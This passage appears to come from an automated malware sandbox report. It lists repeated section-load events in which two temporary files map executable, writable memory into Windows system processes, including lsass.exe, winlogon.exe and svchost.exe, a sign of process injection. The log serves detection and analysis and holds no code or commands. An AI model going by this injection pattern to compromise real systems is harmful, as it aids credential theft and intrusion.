Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: \BaseNamedObjects\vdqtVt target: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\winlogon.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\lsass.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\dwm.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: C:\Windows\System32\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: \BaseNamedObjects\rnxtVt target: unknown protection: execute and read and write	Jump to behavior
